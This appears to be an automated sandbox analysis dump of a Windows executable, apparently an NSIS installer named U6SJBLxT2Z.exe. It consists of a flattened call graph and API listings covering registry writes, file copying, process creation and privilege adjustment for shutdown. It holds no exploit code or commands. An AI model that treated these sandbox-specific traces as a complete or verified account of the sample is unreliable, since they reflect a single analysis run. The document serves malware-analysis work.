5281->5279 5283 6f7710a2 5282->5283 5284 6f7710b2 5283->5284 5285 6f7710a9 GlobalSize 5283->5285 5286 6f7710b6 GlobalAlloc 5284->5286 5287 6f7710c7 5284->5287 5285->5284 5288 6f77153d 3 API calls 5286->5288 5289 6f7710d2 GlobalFree 5287->5289 5288->5287 5289->5278 5290 401a72 5291 402d1c 17 API calls 5290->5291 5292 401a7b 5291->5292 5293 402d1c 17 API calls 5292->5293 5294 401a20 5293->5294 4781 401573 4782 401583 ShowWindow 4781->4782 4783 40158c 4781->4783 4782->4783 4784 402bc2 4783->4784 4785 40159a ShowWindow 4783->4785 4785->4784 5295 4014f5 SetForegroundWindow 5296 402bc2 5295->5296 5297 401ff6 5298 402d3e 17 API calls 5297->5298 5299 401ffd 5298->5299 5300 40676f 2 API calls 5299->5300 5301 402003 5300->5301 5302 402014 5301->5302 5304 406358 wsprintfW 5301->5304 5304->5302 5305 4022f7 5306 402d3e 17 API calls 5305->5306 5307 4022fd 5306->5307 5308 402d3e 17 API calls 5307->5308 5309 402306 5308->5309 5310 402d3e 17 API calls 5309->5310 5311 40230f 5310->5311 5312 40676f 2 API calls 5311->5312 5313 402318 5312->5313 5314 402329 lstrlenW lstrlenW 5313->5314 5315 40231c 5313->5315 5317 405479 24 API calls 5314->5317 5316 405479 24 API calls 5315->5316 5319 402324 5315->5319 5316->5319 5318 402367 SHFileOperationW 5317->5318 5318->5315 5318->5319 5320 401b77 5321 402d3e 17 API calls 5320->5321 5322 401b7e 5321->5322 5323 402d1c 17 API calls 5322->5323 5324 401b87 wsprintfW 5323->5324 5325 402bc2 5324->5325 5326 40167b 5327 402d3e 17 API calls 5326->5327 5328 401682 5327->5328 5329 402d3e 17 API calls 5328->5329 5330 40168b 5329->5330 5331 402d3e 17 API calls 5330->5331 5332 401694 MoveFileW 5331->5332 5333 4016a0 5332->5333 5334 4016a7 5332->5334 5335 401423 24 API calls 5333->5335 5336 40676f 2 API calls 5334->5336 5338 4022ee 5334->5338 5335->5338 5337 4016b6 5336->5337 5337->5338 5339 4061d7 36 API calls 5337->5339 5339->5333 5340 40237b 5341 402382 5340->5341 5343 402395 5340->5343 5342 40644e 17 API calls 5341->5342 5344 40238f 5342->5344 5344->5343 5345 405a77 MessageBoxIndirectW 5344->5345 5345->5343 5346 6f772349 5347 6f7723b3 5346->5347 5348 6f7723be GlobalAlloc 5347->5348 5349 6f7723dd 5347->5349 5348->5347 5350 4019ff 5351 402d3e 17 API calls 5350->5351 5352 401a06 5351->5352 5353 402d3e 17 API calls 5352->5353 5354 401a0f 5353->5354 5355 401a16 lstrcmpiW 5354->5355 5356 401a28 lstrcmpW 5354->5356 5357 401a1c 5355->5357 5356->5357 5358 401000 5359 401037 BeginPaint GetClientRect 5358->5359 5360 40100c DefWindowProcW 5358->5360 5362 4010f3 5359->5362 5363 401179 5360->5363 5364 401073 CreateBrushIndirect FillRect DeleteObject 5362->5364 5365 4010fc 5362->5365 5364->5362 5366 401102 CreateFontIndirectW 5365->5366 5367 401167 EndPaint 5365->5367 5366->5367 5368 401112 6 API calls 5366->5368 5367->5363 5368->5367 5369 401d81 5370 401d94 GetDlgItem 5369->5370 5371 401d87 5369->5371 5373 401d8e 5370->5373 5372 402d1c 17 API calls 5371->5372 5372->5373 5374 401dd5 GetClientRect LoadImageW SendMessageW 5373->5374 5375 402d3e 17 API calls 5373->5375 5377 401e33 5374->5377 5379 401e3f 5374->5379 5375->5374 5378 401e38 DeleteObject 5377->5378 5377->5379 5378->5379 5380 402482 5381 402d3e 17 API calls 5380->5381 5382 402494 5381->5382 5383 402d3e 17 API calls 5382->5383 5384 40249e 5383->5384 5397 402dce 5384->5397 5387 402bc2 5388 4024d6 5391 402d1c 17 API calls 5388->5391 5394 4024e2 5388->5394 5389 402d3e 17 API calls 5390 4024cc lstrlenW 5389->5390 5390->5388 5391->5394 5392 402501 RegSetValueExW 5393 402517 RegCloseKey 5392->5393 5393->5387 5394->5392 5395 40324c 31 API calls 5394->5395 5395->5392 5398 402de9 5397->5398 5401 4062ac 5398->5401 5402 4062bb 5401->5402 5403 4024ae 5402->5403 5404 4062c6 RegCreateKeyExW 5402->5404 5403->5387 5403->5388 5403->5389 5404->5403 5405 402902 5406 402d3e 17 API calls 5405->5406 5407 402909 FindFirstFileW 5406->5407 5408 402931 5407->5408 5412 40291c 5407->5412 5409 40293a 5408->5409 5413 406358 wsprintfW 5408->5413 5414 406411 lstrcpynW 5409->5414 5413->5409 5414->5412 5415 401503 5416 40151e 5415->5416 5417 40150b 5415->5417 5418 402d1c 17 API calls 5417->5418 5418->5416 5419 402889 5420 402890 5419->5420 5421 402b0d 5419->5421 5422 402d1c 17 API calls 5420->5422 5423 402897 5422->5423 5424 4028a6 SetFilePointer 5423->5424 5424->5421 5425 4028b6 5424->5425 5427 406358 wsprintfW 5425->5427 5427->5421 5428 6f77103d 5431 6f77101b 5428->5431 5432 6f771516 GlobalFree 5431->5432 5433 6f771020 5432->5433 5434 6f771027 GlobalAlloc 5433->5434 5435 6f771024 5433->5435 5434->5435 5436 6f77153d 3 API calls 5435->5436 5437 6f77103b 5436->5437 5438 40190c 5439 401943 5438->5439 5440 402d3e 17 API calls 5439->5440 5441 401948 5440->5441 5442 405b23 67 API calls 5441->5442 5443 401951 5442->5443 4451 403e8e 4452 403fe1 4451->4452 4453 403ea6 4451->4453 4455 403ff2 GetDlgItem GetDlgItem 4452->4455 4456 404032 4452->4456 4453->4452 4454 403eb2 4453->4454 4458 403ed0 4454->4458 4459 403ebd SetWindowPos 4454->4459 4460 404367 18 API calls 4455->4460 4457 40408c 4456->4457 4465 401389 2 API calls 4456->4465 4461 4043b3 SendMessageW 4457->4461 4466 403fdc 4457->4466 4462 403ed5 ShowWindow 4458->4462 4463 403eed 4458->4463 4459->4458 4464 40401c SetClassLongW 4460->4464 4490 40409e 4461->4490 4462->4463 4467 403ef5 DestroyWindow 4463->4467 4468 403f0f 4463->4468 4469 40140b 2 API calls 4464->4469 4472 404064 4465->4472 4473 4042f0 4467->4473 4470 403f14 SetWindowLongW 4468->4470 4471 403f25 4468->4471 4469->4456 4470->4466 4474 403f31 GetDlgItem 4471->4474 4475 403fce 4471->4475 4472->4457 4476 404068 SendMessageW 4472->4476 4473->4466 4482 404321 ShowWindow 4473->4482 4479 403f61 4474->4479 4480 403f44 SendMessageW IsWindowEnabled 4474->4480 4531 4043ce 4475->4531 4476->4466 4477 40140b 2 API calls 4477->4490 4478 4042f2 DestroyWindow EndDialog 4478->4473 4484 403f6e 4479->4484 4487 403fb5 SendMessageW 4479->4487 4488 403f81 4479->4488 4496 403f66 4479->4496 4480->4466 4480->4479 4482->4466 4483 40644e 17 API calls 4483->4490 4484->4487 4484->4496 4486 404367 18 API calls 4486->4490 4487->4475 4491 403f89 4488->4491 4492 403f9e 4488->4492 4489 403f9c 4489->4475 4490->4466 4490->4477 4490->4478 4490->4483 4490->4486 4513 404232 DestroyWindow 4490->4513 4522 404367 4490->4522 4494 40140b 2 API calls 4491->4494 4493 40140b 2 API calls 4492->4493 4495 403fa5 4493->4495 4494->4496 4495->4475 4495->4496 4528 404340 4496->4528 4498 404119 GetDlgItem 4499 404136 ShowWindow KiUserCallbackDispatcher 4498->4499 4500 40412e 4498->4500 4525 404389 KiUserCallbackDispatcher 4499->4525 4500->4499 4502 404160 EnableWindow 4507 404174 4502->4507 4503 404179 GetSystemMenu EnableMenuItem SendMessageW 4504 4041a9 SendMessageW 4503->4504 4503->4507 4504->4507 4506 403e6f 18 API calls 4506->4507 4507->4503 4507->4506 4526 40439c SendMessageW 4507->4526 4527 406411 lstrcpynW 4507->4527 4509 4041d8 lstrlenW 4510 40644e 17 API calls 4509->4510 4511 4041ee SetWindowTextW 4510->4511 4512 401389 2 API calls 4511->4512 4512->4490 4513->4473 4514 40424c CreateDialogParamW 4513->4514 4514->4473 4515 40427f 4514->4515 4516 404367 18 API calls 4515->4516 4517 40428a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4516->4517 4518 401389 2 API calls 4517->4518 4519 4042d0 4518->4519 4519->4466 4520 4042d8 ShowWindow 4519->4520 4521 4043b3 SendMessageW 4520->4521 4521->4473 4523 40644e 17 API calls 4522->4523 4524 404372 SetDlgItemTextW 4523->4524 4524->4498 4525->4502 4526->4507 4527->4509 4529 404347 4528->4529 4530 40434d SendMessageW 4528->4530 4529->4530 4530->4489 4532 404491 4531->4532 4533 4043e6 GetWindowLongW 4531->4533 4532->4466 4533->4532 4534 4043fb 4533->4534 4534->4532 4535 404428 GetSysColor 4534->4535 4536 40442b 4534->4536 4535->4536 4537 404431 SetTextColor 4536->4537 4538 40443b SetBkMode 4536->4538 4537->4538 4539 404453 GetSysColor 4538->4539 4540 404459 4538->4540 4539->4540 4541 404460 SetBkColor 4540->4541 4542 40446a 4540->4542 4541->4542 4542->4532 4543 404484 CreateBrushIndirect 4542->4543 4544 40447d DeleteObject 4542->4544 4543->4532 4544->4543 5444 40190f 5445 402d3e 17 API calls 5444->5445 5446 401916 5445->5446 5447 405a77 MessageBoxIndirectW 5446->5447 5448 40191f 5447->5448 5449 404811 5450 404821 5449->5450 5451 404847 5449->5451 5452 404367 18 API calls 5450->5452 5453 4043ce 8 API calls 5451->5453 5454 40482e SetDlgItemTextW 5452->5454 5455 404853 5453->5455 5454->5451 5456 401491 5457 405479 24 API calls 5456->5457 5458 401498 5457->5458 5459 401f12 5460 402d3e 17 API calls 5459->5460 5461 401f18 5460->5461 5462 402d3e 17 API calls 5461->5462 5463 401f21 5462->5463 5464 402d3e 17 API calls 5463->5464 5465 401f2a 5464->5465 5466 402d3e 17 API calls 5465->5466 5467 401f33 5466->5467 5468 401423 24 API calls 5467->5468 5469 401f3a 5468->5469 5476 405a3d ShellExecuteExW 5469->5476 5471 401f82 5472 4068b1 5 API calls 5471->5472 5473 402925 5471->5473 5474 401f9f CloseHandle 5472->5474 5474->5473 5476->5471 5477 402614 5478 402d3e 17 API calls 5477->5478 5479 40261b 5478->5479 5482 405f07 GetFileAttributesW CreateFileW 5479->5482 5481 402627 5482->5481 5483 6f772ca3 5484 6f772cbb 5483->5484 5485 6f77158f 2 API calls 5484->5485 5486 6f772cd6 5485->5486 4786 402596 4797 402d7e 4786->4797 4790 4025a9 4791 4025d1 RegEnumValueW 4790->4791 4792 4025c5 RegEnumKeyW 4790->4792 4795 402925 4790->4795 4793 4025ed RegCloseKey 4791->4793 4794 4025e6 4791->4794 4792->4793 4793->4795 4794->4793 4798 402d3e 17 API calls 4797->4798 4799 402d95 4798->4799 4800 40627e RegOpenKeyExW 4799->4800 4801 4025a0 4800->4801 4802 402d1c 4801->4802 4803 40644e 17 API calls 4802->4803 4804 402d31 4803->4804 4804->4790 5487 401d17 5488 402d1c 17 API calls 5487->5488 5489 401d1d IsWindow 5488->5489 5490 401a20 5489->5490 4860 401b9b 4861 401ba8 4860->4861 4862 401bec 4860->4862 4865 401c31 4861->4865 4870 401bbf 4861->4870 4863 401bf1 4862->4863 4864 401c16 GlobalAlloc 4862->4864 4873 402395 4863->4873 4881 406411 lstrcpynW 4863->4881 4866 40644e 17 API calls 4864->4866 4867 40644e 17 API calls 4865->4867 4865->4873 4866->4865 4869 40238f 4867->4869 4869->4873 4875 405a77 MessageBoxIndirectW 4869->4875 4879 406411 lstrcpynW 4870->4879 4872 401c03 GlobalFree 4872->4873 4874 401bce 4880 406411 lstrcpynW 4874->4880 4875->4873 4877 401bdd 4882 406411 lstrcpynW 4877->4882 4879->4874 4880->4877 4881->4872 4882->4873 5491 40449d lstrcpynW lstrlenW 5492 402b9d SendMessageW 5493 402bc2 5492->5493 5494 402bb7 InvalidateRect 5492->5494 5494->5493 5495 40149e 5496 402395 5495->5496 5497 4014ac PostQuitMessage 5495->5497 5497->5496 5498 403a9e 5499 403aa9 5498->5499 5500 403ab0 GlobalAlloc 5499->5500 5501 403aad 5499->5501 5500->5501 5502 402522 5503 402d7e 17 API calls 5502->5503 5504 40252c 5503->5504 5505 402d3e 17 API calls 5504->5505 5506 402535 5505->5506 5507 402540 RegQueryValueExW 5506->5507 5510 402925 5506->5510 5508 402560 5507->5508 5509 402566 RegCloseKey 5507->5509 5508->5509 5513 406358 wsprintfW 5508->5513 5509->5510 5513->5509 5514 4021a2 5515 402d3e 17 API calls 5514->5515 5516 4021a9 5515->5516 5517 402d3e 17 API calls 5516->5517 5518 4021b3 5517->5518 5519 402d3e 17 API calls 5518->5519 5520 4021bd 5519->5520 5521 402d3e 17 API calls 5520->5521 5522 4021c7 5521->5522 5523 402d3e 17 API calls 5522->5523 5525 4021d1 5523->5525 5524 402210 CoCreateInstance 5529 40222f 5524->5529 5525->5524 5526 402d3e 17 API calls 5525->5526 5526->5524 5527 401423 24 API calls 5528 4022ee 5527->5528 5529->5527 5529->5528 4135 4015a3 4136 402d3e 17 API calls 4135->4136 4137 4015aa SetFileAttributesW 4136->4137 4138 4015bc 4137->4138 4139 401fa4 4140 402d3e 17 API calls 4139->4140 4141 401faa 4140->4141 4142 405479 24 API calls 4141->4142 4143 401fb4 4142->4143 4154 4059fa CreateProcessW 4143->4154 4146 401fdd CloseHandle 4149 402925 4146->4149 4150 401fcf 4151 401fd4 4150->4151 4152 401fdf 4150->4152 4162 406358 wsprintfW 4151->4162 4152->4146 4155 401fba 4154->4155 4156 405a2d CloseHandle 4154->4156 4155->4146 4155->4149 4157 4068b1 WaitForSingleObject 4155->4157 4156->4155 4158 4068cb 4157->4158 4159 4068dd GetExitCodeProcess 4158->4159 4163 406842 4158->4163 4159->4150 4162->4146 4164 40685f PeekMessageW 4163->4164 4165 406855 DispatchMessageW 4164->4165 4166 40686f WaitForSingleObject 4164->4166 4165->4164 4166->4158 5530 404526 5533 404658 5530->5533 5535 40453e 5530->5535 5531 4046c2 5532 4046cc GetDlgItem 5531->5532 5534 40478c 5531->5534 5537 4046e6 5532->5537 5538 40474d 5532->5538 5533->5531 5533->5534 5541 404693 GetDlgItem SendMessageW 5533->5541 5540 4043ce 8 API calls 5534->5540 5536 404367 18 API calls 5535->5536 5539 4045a5 5536->5539 5537->5538 5544 40470c SendMessageW LoadCursorW SetCursor 5537->5544 5538->5534 5545 40475f 5538->5545 5542 404367 18 API calls 5539->5542 5543 404787 5540->5543 5563 404389 KiUserCallbackDispatcher 5541->5563 5548 4045b2 CheckDlgButton 5542->5548 5564 4047d5 5544->5564 5550 404775 5545->5550 5551 404765 SendMessageW 5545->5551 5547 4046bd 5552 4047b1 SendMessageW 5547->5552 5561 404389 KiUserCallbackDispatcher 5548->5561 5550->5543 5555 40477b SendMessageW 5550->5555 5551->5550 5552->5531 5555->5543 5556 4045d0 GetDlgItem 5562 40439c SendMessageW 5556->5562 5558 4045e6 SendMessageW 5559 404603 GetSysColor 5558->5559 5560 40460c SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5558->5560 5559->5560 5560->5543 5561->5556 5562->5558 5563->5547 5567 405a3d ShellExecuteExW 5564->5567 5566 40473b LoadCursorW SetCursor 5566->5538 5567->5566 5568 40202a 5569 402d3e 17 API calls 5568->5569 5570 402031 5569->5570 5571 406806 5 API calls 5570->5571 5572 402040 5571->5572 5573 40205c GlobalAlloc 5572->5573 5575 4020c4 5572->5575 5574 402070 5573->5574 5573->5575 5576 406806 5 API calls 5574->5576 5577 402077 5576->5577 5578 406806 5 API calls 5577->5578 5579 402081 5578->5579 5579->5575 5583 406358 wsprintfW 5579->5583 5581 4020b6 5584 406358 wsprintfW 5581->5584 5583->5581 5584->5575 5585 4023aa 5586 4023b2 5585->5586 5587 4023b8 5585->5587 5588 402d3e 17 API calls 5586->5588 5589 4023c6 5587->5589 5590 402d3e 17 API calls 5587->5590 5588->5587 5591 4023d4 5589->5591 5592 402d3e 17 API calls 5589->5592 5590->5589 5593 402d3e 17 API calls 5591->5593 5592->5591 5594 4023dd WritePrivateProfileStringW 5593->5594 5595 402f2b 5596 402f56 5595->5596 5597 402f3d SetTimer 5595->5597 5598 402fab 5596->5598 5599 402f70 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5596->5599 5597->5596 5599->5598 5600 40242c 5601 402434 5600->5601 5602 40245f 5600->5602 5603 402d7e 17 API calls 5601->5603 5604 402d3e 17 API calls 5602->5604 5606 40243b 5603->5606 5605 402466 5604->5605 5611 402dfc 5605->5611 5608 402473 5606->5608 5609 402d3e 17 API calls 5606->5609 5610 40244c RegDeleteValueW RegCloseKey 5609->5610 5610->5608 5612 402e10 5611->5612 5614 402e09 5611->5614 5612->5614 5615 402e41 5612->5615 5614->5608 5616 40627e RegOpenKeyExW 5615->5616 5617 402e6f 5616->5617 5618 402e7f RegEnumValueW 5617->5618 5625 402ea2 5617->5625 5626 402f19 5617->5626 5619 402f09 RegCloseKey 5618->5619 5618->5625 5619->5626 5620 402ede RegEnumKeyW 5621 402ee7 RegCloseKey 5620->5621 5620->5625 5622 406806 5 API calls 5621->5622 5624 402ef7 5622->5624 5623 402e41 6 API calls 5623->5625 5624->5626 5627 402efb RegDeleteKeyW 5624->5627 5625->5619 5625->5620 5625->5621 5625->5623 5626->5614 5627->5626 5628 404bae 5629 404bda 5628->5629 5630 404bbe 5628->5630 5632 404be0 SHGetPathFromIDListW 5629->5632 5633 404c0d 5629->5633 5639 405a5b GetDlgItemTextW 5630->5639 5635 404bf0 5632->5635 5636 404bf7 SendMessageW 5632->5636 5634 404bcb SendMessageW 5634->5629 5637 40140b 2 API calls 5635->5637 5636->5633 5637->5636 5639->5634 5640 401a30 5641 402d3e 17 API calls 5640->5641 5642 401a39 ExpandEnvironmentStringsW 5641->5642 5643 401a4d 5642->5643 5645 401a60 5642->5645 5644 401a52 lstrcmpW 5643->5644 5643->5645 5644->5645 5651 401735 5652 402d3e 17 API calls 5651->5652 5653 40173c SearchPathW 5652->5653 5654 401757 5653->5654 5655 402636 5656 402665 5655->5656 5657 40264a 5655->5657 5659 402695 5656->5659 5660 40266a 5656->5660 5658 402d1c 17 API calls 5657->5658 5669 402651 5658->5669 5661 402d3e 17 API calls 5659->5661 5662 402d3e 17 API calls 5660->5662 5664 40269c lstrlenW 5661->5664 5663 402671 5662->5663 5672 406433 WideCharToMultiByte 5663->5672 5664->5669 5666 402685 lstrlenA 5666->5669 5667 4026df 5668 4026c9 5668->5667 5670 405fb9 WriteFile 5668->5670 5669->5667 5669->5668 5671 405fe8 5 API calls 5669->5671 5670->5667 5671->5668 5672->5666 5673 6f771000 5674 6f77101b 5 API calls 5673->5674 5675 6f771019 5674->5675 4810 4055b8 4811 405762 4810->4811 4812 4055d9 GetDlgItem GetDlgItem GetDlgItem 4810->4812 4814 405793 4811->4814 4815 40576b GetDlgItem CreateThread CloseHandle 4811->4815 4856 40439c SendMessageW 4812->4856 4817 4057be 4814->4817 4818 4057e3 4814->4818 4819 4057aa ShowWindow ShowWindow 4814->4819 4815->4814 4859 40554c 5 API calls 4815->4859 4816 405649 4826 405650 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4816->4826 4820 4057ca 4817->4820 4821 40581e 4817->4821 4825 4043ce 8 API calls 4818->4825 4858 40439c SendMessageW 4819->4858 4823 4057d2 4820->4823 4824 4057f8 ShowWindow 4820->4824 4821->4818 4827 40582c SendMessageW 4821->4827 4828 404340 SendMessageW 4823->4828 4829 405818 4824->4829 4830 40580a 4824->4830 4833 4057f1 4825->4833 4831 4056a2 SendMessageW SendMessageW 4826->4831 4832 4056be 4826->4832 4827->4833 4834 405845 CreatePopupMenu 4827->4834 4828->4818 4838 404340 SendMessageW 4829->4838 4837 405479 24 API calls 4830->4837 4831->4832 4835 4056d1 4832->4835 4836 4056c3 SendMessageW 4832->4836 4839 40644e 17 API calls 4834->4839 4840 404367 18 API calls 4835->4840 4836->4835 4837->4829 4838->4821 4841 405855 AppendMenuW 4839->4841 4842 4056e1 4840->4842 4843 405872 GetWindowRect 4841->4843 4844 405885 TrackPopupMenu 4841->4844 4845 4056ea ShowWindow 4842->4845 4846 40571e GetDlgItem SendMessageW 4842->4846 4843->4844 4844->4833 4847 4058a0 4844->4847 4848 405700 ShowWindow 4845->4848 4849 40570d 4845->4849 4846->4833 4850 405745 SendMessageW SendMessageW 4846->4850 4851 4058bc SendMessageW 4847->4851 4848->4849 4857 40439c SendMessageW 4849->4857 4850->4833 4851->4851 4852 4058d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4851->4852 4854 4058fe SendMessageW 4852->4854 4854->4854 4855 405927 GlobalUnlock SetClipboardData CloseClipboard 4854->4855 4855->4833 4856->4816 4857->4846 4858->4817 5676 4014b8 5677 4014be 5676->5677 5678 401389 2 API calls 5677->5678 5679 4014c6 5678->5679 5680 401d38 5681 402d1c 17 API calls 5680->5681 5682 401d3f 5681->5682 5683 402d1c 17 API calls 5682->5683 5684 401d4b GetDlgItem 5683->5684 5685 402630 5684->5685 5686 4028bb 5687 4028c1 5686->5687 5688 4028c9 FindClose 5687->5688 5689 402bc2 5687->5689 5688->5689

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 0 4034c5-403502 SetErrorMode GetVersion 1 403504-40350c call 406806 0->1 2 403515 0->2 1->2 7 40350e 1->7 4 40351a-40352e call 406796 lstrlenA 2->4 9 403530-40354c call 406806 * 3 4->9 7->2 16 40355d-4035bc #17 OleInitialize SHGetFileInfoW call 406411 GetCommandLineW call 406411 9->16 17 40354e-403554 9->17 24 4035c6-4035e0 call 405d13 CharNextW 16->24 25 4035be-4035c5 16->25 17->16 21 403556 17->21 21->16 28 4035e6-4035ec 24->28 29 4036f7-403711 GetTempPathW call 403494 24->29 25->24 30 4035f5-4035f9 28->30 31 4035ee-4035f3 28->31 38 403713-403731 GetWindowsDirectoryW lstrcatW call 403494 29->38 39 403769-403783 DeleteFileW call 403015 29->39 33 403600-403604 30->33 34 4035fb-4035ff 30->34 31->30 31->31 36 4036c3-4036d0 call 405d13 33->36 37 40360a-403610 33->37 34->33 52 4036d2-4036d3 36->52 53 4036d4-4036da 36->53 42 403612-40361a 37->42 43 40362b-403664 37->43 38->39 58 403733-403763 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403494 38->58 54 403834-403844 call 403a06 OleUninitialize 39->54 55 403789-40378f 39->55 47 403621 42->47 48 40361c-40361f 42->48 49 403681-4036bb 43->49 50 403666-40366b 43->50 47->43 48->43 48->47 49->36 57 4036bd-4036c1 49->57 50->49 56 40366d-403675 50->56 52->53 53->28 59 4036e0 53->59 75 40396a-403970 54->75 76 40384a-40385a call 405a77 ExitProcess 54->76 60 403824-40382b call 403ae0 55->60 61 403795-4037a0 call 405d13 55->61 63 403677-40367a 56->63 64 40367c 56->64 57->36 65 4036e2-4036f0 call 406411 57->65 58->39 58->54 68 4036f5 59->68 74 403830 60->74 79 4037a2-4037d7 61->79 80 4037ee-4037f8 61->80 63->49 63->64 64->49 65->68 68->29 74->54 77 403972-403988 GetCurrentProcess OpenProcessToken 75->77 78 4039ee-4039f6 75->78 82 40398a-4039b8 LookupPrivilegeValueW AdjustTokenPrivileges 77->82 83 4039be-4039cc call 406806 77->83 85 4039f8 78->85 86 4039fc-403a00 ExitProcess 78->86 84 4037d9-4037dd 79->84 87 403860-403874 call 4059e2 lstrcatW 80->87 88 4037fa-403808 call 405dee 80->88 82->83 102 4039da-4039e5 ExitWindowsEx 83->102 103 4039ce-4039d8 83->103 92 4037e6-4037ea 84->92 93 4037df-4037e4 84->93 85->86 100 403881-40389b lstrcatW lstrcmpiW 87->100 101 403876-40387c lstrcatW 87->101 88->54 99 40380a-403820 call 406411 * 2 88->99 92->84 98 4037ec 92->98 93->92 93->98 98->80 99->60 100->54 105 40389d-4038a0 100->105 101->100 102->78 106 4039e7-4039e9 call 40140b 102->106 103->102 103->106 108 4038a2-4038a7 call 405948 105->108 109 4038a9 call 4059c5 105->109 106->78 117 4038ae-4038bc SetCurrentDirectoryW 108->117 109->117 118 4038c9-4038f2 call 406411 117->118 119 4038be-4038c4 call 406411 117->119 123 4038f7-403913 call 40644e DeleteFileW 118->123 119->118 126 403954-40395c 123->126 127 403915-403925 CopyFileW 123->127 126->123 129 40395e-403965 call 4061d7 126->129 127->126 128 403927-403947 call 4061d7 call 40644e call 4059fa 127->128 128->126 138 403949-403950 CloseHandle 128->138 129->54 138->126
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetErrorMode.KERNELBASE ref: 004034E8
                                                                                                                                                                                                  • GetVersion.KERNEL32 ref: 004034EE
                                                                                                                                                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403521
                                                                                                                                                                                                  • #17.COMCTL32(?,?,00000009,?), ref: 0040355E
                                                                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 00403565
                                                                                                                                                                                                  • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403581
                                                                                                                                                                                                  • GetCommandLineW.KERNEL32(00433F00,NSIS Error,?,?,00000009,?), ref: 00403596
                                                                                                                                                                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\U6SJBLxT2Z.exe",00000020,"C:\Users\user\Desktop\U6SJBLxT2Z.exe",00000000,?,?,00000009,?), ref: 004035CE
                                                                                                                                                                                                    • Part of subcall function 00406806: GetModuleHandleA.KERNEL32(?,00000020,?,00403537,?), ref: 00406818
                                                                                                                                                                                                    • Part of subcall function 00406806: GetProcAddress.KERNEL32(00000000,?), ref: 00406833
                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,?,00000009,?), ref: 00403708
                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,?,00000009,?), ref: 00403719
                                                                                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403725
                                                                                                                                                                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,?,00000009,?), ref: 00403739
                                                                                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403741
                                                                                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,?,00000009,?), ref: 00403752
                                                                                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,?,00000009,?), ref: 0040375A
                                                                                                                                                                                                  • DeleteFileW.KERNELBASE(1033,?,?,00000009,?), ref: 0040376E
                                                                                                                                                                                                    • Part of subcall function 00406411: lstrcpynW.KERNEL32(?,?,00000400,00403596,00433F00,NSIS Error,?,?,00000009,?), ref: 0040641E
                                                                                                                                                                                                  • OleUninitialize.OLE32(?,?,?,00000009,?), ref: 00403839
                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040385A
                                                                                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 0040386D
                                                                                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040387C
                                                                                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403887
                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\U6SJBLxT2Z.exe",00000000,?,?,?,00000009,?), ref: 00403893
                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,?,00000009,?), ref: 004038AF
                                                                                                                                                                                                  • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,00000009,?,?,00000009,?), ref: 00403909
                                                                                                                                                                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\U6SJBLxT2Z.exe,0042AA28,00000001,?,?,00000009,?), ref: 0040391D
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000,?,?,00000009,?), ref: 0040394A
                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,00000009,?), ref: 00403979
                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403980
                                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403995
                                                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 004039B8
                                                                                                                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 004039DD
                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403A00
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
